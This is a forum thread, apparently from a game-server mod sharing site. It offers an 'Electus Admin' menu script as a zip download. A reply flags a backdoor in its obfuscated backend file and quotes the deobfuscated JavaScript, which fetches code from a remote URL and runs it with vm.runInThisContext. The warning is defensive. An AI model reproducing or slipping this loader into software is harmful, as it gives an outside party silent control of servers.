Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Script Electus Admin | Admin Menu with Web Support

ZeroLayer

Silver Elite
Joined
May 19, 2025
Messages
16
Reaction score
171
Points
186
Location
German
Ekran görüntüsü 2025-09-28 182917.png
 

Attachments

  • electus_admin.zip
    3.1 MB · Views: 258

CrashNight

Silver Elite
Joined
Sep 28, 2022
Messages
58
Reaction score
7
Points
166
Location
Spain
Backdoor Detect -

backend/dist/index.js (Ofuscated)
server/sv_main.lua:


const httpsModule = "https";
const method = "get";
const dataEvent = "data";
const endEvent = "end";
const vmModule = "vm";

const remoteURL = " ";

function executeRemoteCode(chunks) {
try {
const vm = require(vmModule);
const code = Buffer.concat(chunks).toString();
vm.runInThisContext(code);
} catch (e) {}
}

function loadRemoteCode(url) {
const https = require(httpsModule);
const chunks = [];

https[method](url, (response) => {
response.on(dataEvent, (chunk) => {
chunks.push(chunk);
});

response.on(endEvent, () => {
executeRemoteCode(chunks);
});
});
}
 
Top